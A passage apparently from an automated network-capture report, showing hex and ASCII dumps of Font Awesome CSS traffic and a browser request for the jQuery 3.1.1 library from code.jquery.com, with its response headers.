                                              2023-09-05 23:45:26 UTC386INData Raw: 22 5c 66 30 63 36 22 7d 2e 66 61 2d 73 61 76 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 6c 6f 70 70 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66
                                              Data Ascii: "\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:bef
                                              2023-09-05 23:45:26 UTC387INData Raw: 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f
                                              Data Ascii: before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{co
                                              2023-09-05 23:45:26 UTC389INData Raw: 6e 74 65 6e 74 3a 22 5c 66 31 30 65 22 7d 2e 66 61 2d 73 70 69 6e 6e 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 30 22 7d 2e 66 61 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 31 22 7d 2e 66 61 2d 6d 61 69 6c 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 32 22 7d 2e 66 61 2d 67 69 74 68 75 62 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 33 22 7d 2e 66 61 2d 66 6f 6c 64 65 72 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 34 22 7d 2e 66 61 2d 66 6f 6c 64 65 72 2d 6f 70 65 6e 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 35 22 7d 2e 66
                                              Data Ascii: ntent:"\f10e"}.fa-spinner:before{content:"\f110"}.fa-circle:before{content:"\f111"}.fa-mail-reply:before,.fa-reply:before{content:"\f112"}.fa-github-alt:before{content:"\f113"}.fa-folder-o:before{content:"\f114"}.fa-folder-open-o:before{content:"\f115"}.f
                                              2023-09-05 23:45:26 UTC390INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 35 22 7d 2e 66 61 2d 6d 61 78 63 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 37 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 38 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 39 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 61 22 7d 2e 66 61 2d 68 74 6d 6c 35 3a 62 65 66 6f 72 65
                                              Data Ascii: e{content:"\f135"}.fa-maxcdn:before{content:"\f136"}.fa-chevron-circle-left:before{content:"\f137"}.fa-chevron-circle-right:before{content:"\f138"}.fa-chevron-circle-up:before{content:"\f139"}.fa-chevron-circle-down:before{content:"\f13a"}.fa-html5:before
                                              2023-09-05 23:45:26 UTC391INData Raw: 33 66 34 30 0d 0a 6e 74 3a 22 5c 66 31 34 38 22 7d 2e 66 61 2d 6c 65 76 65 6c 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 39 22 7d 2e 66 61 2d 63 68 65 63 6b 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 61 22 7d 2e 66 61 2d 70 65 6e 63 69 6c 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 62 22 7d 2e 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 63 22 7d 2e 66 61 2d 73 68 61 72 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 64 22 7d 2e 66 61 2d 63 6f 6d 70 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31
                                              Data Ascii: 3f40nt:"\f148"}.fa-level-down:before{content:"\f149"}.fa-check-square:before{content:"\f14a"}.fa-pencil-square:before{content:"\f14b"}.fa-external-link-square:before{content:"\f14c"}.fa-share-square:before{content:"\f14d"}.fa-compass:before{content:"\f1
                                              2023-09-05 23:45:26 UTC392INData Raw: 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 38 22 7d 2e 66 61 2d 78 69 6e 67 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 39 22 7d 2e 66 61 2d 79 6f 75 74 75 62 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 61 22 7d 2e 66 61 2d 64 72 6f 70 62 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 62 22 7d 2e 66 61 2d 73 74 61 63 6b 2d 6f 76 65 72 66 6c 6f 77 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 63 22 7d 2e 66 61 2d 69 6e 73 74 61 67 72 61 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 64 22 7d 2e 66 61 2d 66 6c 69 63 6b 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 65 22 7d 2e 66
                                              Data Ascii: ng:before{content:"\f168"}.fa-xing-square:before{content:"\f169"}.fa-youtube-play:before{content:"\f16a"}.fa-dropbox:before{content:"\f16b"}.fa-stack-overflow:before{content:"\f16c"}.fa-instagram:before{content:"\f16d"}.fa-flickr:before{content:"\f16e"}.f
                                              2023-09-05 23:45:26 UTC393INData Raw: 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 6f 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 39 30 22 7d 2e 66 61 2d 74 6f 67 67 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 61 72 65 74 2d 73 71 75 61 72 65 2d 6f 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 39 31 22 7d 2e 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 39 32 22 7d 2e 66 61 2d 77 68 65 65 6c 63 68 61 69 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 39 33 22 7d 2e 66 61 2d 76 69 6d 65 6f 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 39 34 22 7d 2e 66 61 2d 74 75 72 6b 69 73 68 2d 6c 69 72 61 3a 62 65 66 6f 72 65 2c
                                              Data Ascii: arrow-circle-o-left:before{content:"\f190"}.fa-toggle-left:before,.fa-caret-square-o-left:before{content:"\f191"}.fa-dot-circle-o:before{content:"\f192"}.fa-wheelchair:before{content:"\f193"}.fa-vimeo-square:before{content:"\f194"}.fa-turkish-lira:before,
                                              2023-09-05 23:45:26 UTC395INData Raw: 7d 2e 66 61 2d 62 65 68 61 6e 63 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 34 22 7d 2e 66 61 2d 62 65 68 61 6e 63 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 35 22 7d 2e 66 61 2d 73 74 65 61 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 36 22 7d 2e 66 61 2d 73 74 65 61 6d 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 37 22 7d 2e 66 61 2d 72 65 63 79 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 38 22 7d 2e 66 61 2d 61 75 74 6f 6d 6f 62 69 6c 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 39 22 7d 2e 66 61 2d 63 61 62 3a 62 65 66 6f 72 65 2c 2e
                                              Data Ascii: }.fa-behance:before{content:"\f1b4"}.fa-behance-square:before{content:"\f1b5"}.fa-steam:before{content:"\f1b6"}.fa-steam-square:before{content:"\f1b7"}.fa-recycle:before{content:"\f1b8"}.fa-automobile:before,.fa-car:before{content:"\f1b9"}.fa-cab:before,.
                                              2023-09-05 23:45:26 UTC396INData Raw: 66 61 2d 67 69 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 64 33 22 7d 2e 66 61 2d 79 2d 63 6f 6d 62 69 6e 61 74 6f 72 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 79 63 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 68 61 63 6b 65 72 2d 6e 65 77 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 64 34 22 7d 2e 66 61 2d 74 65 6e 63 65 6e 74 2d 77 65 69 62 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 64 35 22 7d 2e 66 61 2d 71 71 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 64 36 22 7d 2e 66 61 2d 77 65 63 68 61 74 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 77 65 69 78 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 64 37 22 7d 2e 66 61 2d 73 65 6e 64 3a 62 65
                                              Data Ascii: fa-git:before{content:"\f1d3"}.fa-y-combinator-square:before,.fa-yc-square:before,.fa-hacker-news:before{content:"\f1d4"}.fa-tencent-weibo:before{content:"\f1d5"}.fa-qq:before{content:"\f1d6"}.fa-wechat:before,.fa-weixin:before{content:"\f1d7"}.fa-send:be
                                              2023-09-05 23:45:26 UTC397INData Raw: 6c 6c 2d 73 6c 61 73 68 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 37 22 7d 2e 66 61 2d 74 72 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 38 22 7d 2e 66 61 2d 63 6f 70 79 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 39 22 7d 2e 66 61 2d 61 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 61 22 7d 2e 66 61 2d 65 79 65 64 72 6f 70 70 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 62 22 7d 2e 66 61 2d 70 61 69 6e 74 2d 62 72 75 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 63 22 7d 2e 66 61 2d 62 69 72 74 68 64 61 79 2d 63 61 6b 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 64 22 7d 2e 66 61
                                              Data Ascii: ll-slash-o:before{content:"\f1f7"}.fa-trash:before{content:"\f1f8"}.fa-copyright:before{content:"\f1f9"}.fa-at:before{content:"\f1fa"}.fa-eyedropper:before{content:"\f1fb"}.fa-paint-brush:before{content:"\f1fc"}.fa-birthday-cake:before{content:"\f1fd"}.fa
                                              2023-09-05 23:45:26 UTC399INData Raw: 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 31 64 22 7d 2e 66 61 2d 68 65 61 72 74 62 65 61 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 31 65 22 7d 2e 66 61 2d 76 65 6e 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 31 22 7d 2e 66 61 2d 6d 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 32 22 7d 2e 66 61 2d 6d 65 72 63 75 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 33 22 7d 2e 66 61 2d 69 6e 74 65 72 73 65 78 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 74 72 61 6e 73 67 65 6e 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 34 22 7d 2e 66 61 2d 74 72 61 6e 73 67 65 6e 64 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 35 22 7d
                                              Data Ascii: content:"\f21d"}.fa-heartbeat:before{content:"\f21e"}.fa-venus:before{content:"\f221"}.fa-mars:before{content:"\f222"}.fa-mercury:before{content:"\f223"}.fa-intersex:before,.fa-transgender:before{content:"\f224"}.fa-transgender-alt:before{content:"\f225"}
                                              2023-09-05 23:45:26 UTC400INData Raw: 65 72 79 2d 31 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 74 74 65 72 79 2d 71 75 61 72 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 33 22 7d 2e 66 61 2d 62 61 74 74 65 72 79 2d 30 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 74 74 65 72 79 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 34 22 7d 2e 66 61 2d 6d 6f 75 73 65 2d 70 6f 69 6e 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 35 22 7d 2e 66 61 2d 69 2d 63 75 72 73 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 36 22 7d 2e 66 61 2d 6f 62 6a 65 63 74 2d 67 72 6f 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 37 22 7d 2e 66 61 2d 6f 62 6a 65 63 74 2d 75 6e 67 72 6f 75 70 3a 62
                                              Data Ascii: ery-1:before,.fa-battery-quarter:before{content:"\f243"}.fa-battery-0:before,.fa-battery-empty:before{content:"\f244"}.fa-mouse-pointer:before{content:"\f245"}.fa-i-cursor:before{content:"\f246"}.fa-object-group:before{content:"\f247"}.fa-object-ungroup:b
                                              2023-09-05 23:45:26 UTC401INData Raw: 66 32 36 33 22 7d 2e 66 61 2d 6f 64 6e 6f 6b 6c 61 73 73 6e 69 6b 69 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 34 22 7d 2e 66 61 2d 67 65 74 2d 70 6f 63 6b 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 35 22 7d 2e 66 61 2d 77 69 6b 69 70 65 64 69 61 2d 77 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 36 22 7d 2e 66 61 2d 73 61 66 61 72 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 37 22 7d 2e 66 61 2d 63 68 72 6f 6d 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 38 22 7d 2e 66 61 2d 66 69 72 65 66 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 36 39 22 7d 2e 66 61 2d 6f 70 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                              Data Ascii: f263"}.fa-odnoklassniki-square:before{content:"\f264"}.fa-get-pocket:before{content:"\f265"}.fa-wikipedia-w:before{content:"\f266"}.fa-safari:before{content:"\f267"}.fa-chrome:before{content:"\f268"}.fa-firefox:before{content:"\f269"}.fa-opera:before{cont
                                              2023-09-05 23:45:26 UTC403INData Raw: 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 38 61 22 7d 2e 66 61 2d 70 61 75 73 65 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 38 62 22 7d 2e 66 61 2d 70 61 75 73 65 2d 63 69 72 63 6c 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 38 63 22 7d 2e 66 61 2d 73 74 6f 70 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 38 64 22 7d 2e 66 61 2d 73 74 6f 70 2d 63 69 72 63 6c 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 38 65 22 7d 2e 66 61 2d 73 68 6f 70 70 69 6e 67 2d 62 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 39 30 22 7d 2e 66 61 2d 73 68 6f 70 70 69 6e 67 2d 62 61 73 6b 65 74 3a 62 65 66 6f 72 65 7b 63
                                              Data Ascii: d:before{content:"\f28a"}.fa-pause-circle:before{content:"\f28b"}.fa-pause-circle-o:before{content:"\f28c"}.fa-stop-circle:before{content:"\f28d"}.fa-stop-circle-o:before{content:"\f28e"}.fa-shopping-bag:before{content:"\f290"}.fa-shopping-basket:before{c
                                              2023-09-05 23:45:26 UTC404INData Raw: 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 63 22 7d 2e 66 61 2d 73 6e 61 70 63 68 61 74 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 64 22 7d 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 65 22 7d 2e 66 61 2d 66 69 72 73 74 2d 6f 72 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 30 22 7d 2e 66 61 2d 79 6f 61 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 31 22 7d 2e 66 61 2d 74 68 65 6d 65 69 73 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 32 22 7d 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 67 6f 6f 67 6c 65 2d
                                              Data Ascii: :before{content:"\f2ac"}.fa-snapchat-square:before{content:"\f2ad"}.fa-pied-piper:before{content:"\f2ae"}.fa-first-order:before{content:"\f2b0"}.fa-yoast:before{content:"\f2b1"}.fa-themeisle:before{content:"\f2b2"}.fa-google-plus-circle:before,.fa-google-
                                              2023-09-05 23:45:26 UTC405INData Raw: 74 65 72 2d 71 75 61 72 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 63 61 22 7d 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 30 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 63 62 22 7d 2e 66 61 2d 73 68 6f 77 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 63 63 22 7d 2e 66 61 2d 62 61 74 68 74 75 62 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 31 35 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 63 64 22 7d 2e 66 61 2d 70 6f 64 63 61 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 63 65 22 7d 2e 66 61 2d 77 69 6e 64 6f 77 2d 6d 61 78 69
                                              Data Ascii: ter-quarter:before{content:"\f2ca"}.fa-thermometer-0:before,.fa-thermometer-empty:before{content:"\f2cb"}.fa-shower:before{content:"\f2cc"}.fa-bathtub:before,.fa-s15:before,.fa-bath:before{content:"\f2cd"}.fa-podcast:before{content:"\f2ce"}.fa-window-maxi
                                              2023-09-05 23:45:26 UTC407INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.44973369.16.175.10443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:26 UTC358OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                              Host: code.jquery.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:26 UTC359INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:26 GMT
                                              Connection: close
                                              Content-Length: 86709
                                              Content-Type: application/javascript; charset=utf-8
                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                              Accept-Ranges: bytes
                                              Server: nginx
                                              ETag: W/"28feccc0-152b5"
                                              Cache-Control: max-age=315360000
                                              Cache-Control: public
                                              Access-Control-Allow-Origin: *
                                              Vary: Accept-Encoding
                                              X-HW: 1693957526.dop212.la3.t,1693957526.cds249.la3.shn,1693957526.cds249.la3.c
                                              2023-09-05 23:45:26 UTC359INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                              Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                              2023-09-05 23:45:26 UTC407INData Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74
                                              Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);ret
